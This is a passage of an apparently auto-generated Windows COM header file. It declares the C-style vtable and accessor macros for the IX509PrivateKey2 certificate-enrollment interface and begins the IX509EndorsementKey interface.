            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReaderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ReaderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatus )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspStatus )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in_opt ICspStatus *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509ProviderType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_LegacyCsp )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Algorithm )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeySpec )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509KeySpec Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Length )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ExportPolicy )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ExportPolicy )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyExportFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyUsageFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyProtection )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyProtection )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyProtection Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineContext )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_MachineContext )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Certificate )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UniqueContainerName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultContainer )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Existing )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Existing )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Description )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HardwareKeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509HardwareKeyUsageFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_HardwareKeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509HardwareKeyUsageFlags Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateStorageLocation )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateStorageLocation )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlgorithmName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlgorithmName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlgorithmParameters )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlgorithmParameters )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParametersExportType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509KeyParametersExportType *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParametersExportType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509KeyParametersExportType Value);
        
        END_INTERFACE
    } IX509PrivateKey2Vtbl;

    interface IX509PrivateKey2
    {
        CONST_VTBL struct IX509PrivateKey2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PrivateKey2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PrivateKey2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PrivateKey2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PrivateKey2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PrivateKey2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PrivateKey2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PrivateKey2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PrivateKey2_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509PrivateKey2_Create(This)	\
    ( (This)->lpVtbl -> Create(This) ) 

#define IX509PrivateKey2_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#define IX509PrivateKey2_Delete(This)	\
    ( (This)->lpVtbl -> Delete(This) ) 

#define IX509PrivateKey2_Verify(This,VerifyType)	\
    ( (This)->lpVtbl -> Verify(This,VerifyType) ) 

#define IX509PrivateKey2_Import(This,strExportType,strEncodedKey,Encoding)	\
    ( (This)->lpVtbl -> Import(This,strExportType,strEncodedKey,Encoding) ) 

#define IX509PrivateKey2_Export(This,strExportType,Encoding,pstrEncodedKey)	\
    ( (This)->lpVtbl -> Export(This,strExportType,Encoding,pstrEncodedKey) ) 

#define IX509PrivateKey2_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509PrivateKey2_get_ContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerName(This,pValue) ) 

#define IX509PrivateKey2_put_ContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerName(This,Value) ) 

#define IX509PrivateKey2_get_ContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerNamePrefix(This,pValue) ) 

#define IX509PrivateKey2_put_ContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerNamePrefix(This,Value) ) 

#define IX509PrivateKey2_get_ReaderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ReaderName(This,pValue) ) 

#define IX509PrivateKey2_put_ReaderName(This,Value)	\
    ( (This)->lpVtbl -> put_ReaderName(This,Value) ) 

#define IX509PrivateKey2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509PrivateKey2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509PrivateKey2_get_CspStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatus(This,ppValue) ) 

#define IX509PrivateKey2_put_CspStatus(This,pValue)	\
    ( (This)->lpVtbl -> put_CspStatus(This,pValue) ) 

#define IX509PrivateKey2_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509PrivateKey2_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509PrivateKey2_get_ProviderType(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderType(This,pValue) ) 

#define IX509PrivateKey2_put_ProviderType(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderType(This,Value) ) 

#define IX509PrivateKey2_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define IX509PrivateKey2_put_LegacyCsp(This,Value)	\
    ( (This)->lpVtbl -> put_LegacyCsp(This,Value) ) 

#define IX509PrivateKey2_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PrivateKey2_put_Algorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_Algorithm(This,pValue) ) 

#define IX509PrivateKey2_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509PrivateKey2_put_KeySpec(This,Value)	\
    ( (This)->lpVtbl -> put_KeySpec(This,Value) ) 

#define IX509PrivateKey2_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PrivateKey2_put_Length(This,Value)	\
    ( (This)->lpVtbl -> put_Length(This,Value) ) 

#define IX509PrivateKey2_get_ExportPolicy(This,pValue)	\
    ( (This)->lpVtbl -> get_ExportPolicy(This,pValue) ) 

#define IX509PrivateKey2_put_ExportPolicy(This,Value)	\
    ( (This)->lpVtbl -> put_ExportPolicy(This,Value) ) 

#define IX509PrivateKey2_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#define IX509PrivateKey2_put_KeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_KeyUsage(This,Value) ) 

#define IX509PrivateKey2_get_KeyProtection(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyProtection(This,pValue) ) 

#define IX509PrivateKey2_put_KeyProtection(This,Value)	\
    ( (This)->lpVtbl -> put_KeyProtection(This,Value) ) 

#define IX509PrivateKey2_get_MachineContext(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineContext(This,pValue) ) 

#define IX509PrivateKey2_put_MachineContext(This,Value)	\
    ( (This)->lpVtbl -> put_MachineContext(This,Value) ) 

#define IX509PrivateKey2_get_SecurityDescriptor(This,pValue)	\
    ( (This)->lpVtbl -> get_SecurityDescriptor(This,pValue) ) 

#define IX509PrivateKey2_put_SecurityDescriptor(This,Value)	\
    ( (This)->lpVtbl -> put_SecurityDescriptor(This,Value) ) 

#define IX509PrivateKey2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509PrivateKey2_put_Certificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Certificate(This,Encoding,Value) ) 

#define IX509PrivateKey2_get_UniqueContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_UniqueContainerName(This,pValue) ) 

#define IX509PrivateKey2_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509PrivateKey2_get_DefaultContainer(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultContainer(This,pValue) ) 

#define IX509PrivateKey2_get_Existing(This,pValue)	\
    ( (This)->lpVtbl -> get_Existing(This,pValue) ) 

#define IX509PrivateKey2_put_Existing(This,Value)	\
    ( (This)->lpVtbl -> put_Existing(This,Value) ) 

#define IX509PrivateKey2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509PrivateKey2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509PrivateKey2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509PrivateKey2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509PrivateKey2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509PrivateKey2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509PrivateKey2_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define IX509PrivateKey2_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IX509PrivateKey2_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IX509PrivateKey2_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#define IX509PrivateKey2_put_Description(This,Value)	\
    ( (This)->lpVtbl -> put_Description(This,Value) ) 


#define IX509PrivateKey2_get_HardwareKeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_HardwareKeyUsage(This,pValue) ) 

#define IX509PrivateKey2_put_HardwareKeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_HardwareKeyUsage(This,Value) ) 

#define IX509PrivateKey2_get_AlternateStorageLocation(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateStorageLocation(This,pValue) ) 

#define IX509PrivateKey2_put_AlternateStorageLocation(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateStorageLocation(This,Value) ) 

#define IX509PrivateKey2_get_AlgorithmName(This,pValue)	\
    ( (This)->lpVtbl -> get_AlgorithmName(This,pValue) ) 

#define IX509PrivateKey2_put_AlgorithmName(This,Value)	\
    ( (This)->lpVtbl -> put_AlgorithmName(This,Value) ) 

#define IX509PrivateKey2_get_AlgorithmParameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AlgorithmParameters(This,Encoding,pValue) ) 

#define IX509PrivateKey2_put_AlgorithmParameters(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_AlgorithmParameters(This,Encoding,Value) ) 

#define IX509PrivateKey2_get_ParametersExportType(This,pValue)	\
    ( (This)->lpVtbl -> get_ParametersExportType(This,pValue) ) 

#define IX509PrivateKey2_put_ParametersExportType(This,Value)	\
    ( (This)->lpVtbl -> put_ParametersExportType(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PrivateKey2_INTERFACE_DEFINED__ */


#ifndef __IX509EndorsementKey_INTERFACE_DEFINED__
#define __IX509EndorsementKey_INTERFACE_DEFINED__

/* interface IX509EndorsementKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EndorsementKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("B11CD855-F4C4-4FC6-B710-4422237F09E9")
    IX509EndorsementKey : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ProviderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Opened( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCertificateByIndex( 
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [in] */ LONG dwIndex,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCertificateCount( 
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [retval][out] */ __RPC__out LONG *pCount) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ExportPublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Open( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Close( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EndorsementKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EndorsementKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EndorsementKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EndorsementKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EndorsementKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *AddCertificate )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveCertificate )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificateByIndex )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [in] */ LONG dwIndex,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificateCount )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [retval][out] */ __RPC__out LONG *pCount);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509EndorsementKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509EndorsementKey * This);
        
        END_INTERFACE
    } IX509EndorsementKeyVtbl;

    interface IX509EndorsementKey
    {
        CONST_VTBL struct IX509EndorsementKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EndorsementKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EndorsementKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EndorsementKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EndorsementKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EndorsementKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EndorsementKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EndorsementKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EndorsementKey_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509EndorsementKey_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509EndorsementKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509EndorsementKey_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509EndorsementKey_AddCertificate(This,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> AddCertificate(This,Encoding,strCertificate) ) 

#define IX509EndorsementKey_RemoveCertificate(This,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveCertificate(This,Encoding,strCertificate) ) 

#define IX509EndorsementKey_GetCertificateByIndex(This,ManufacturerOnly,dwIndex,Encoding,pValue)	\
    ( (This)->lpVtbl -> GetCertificateByIndex(This,ManufacturerOnly,dwIndex,Encoding,pValue) ) 

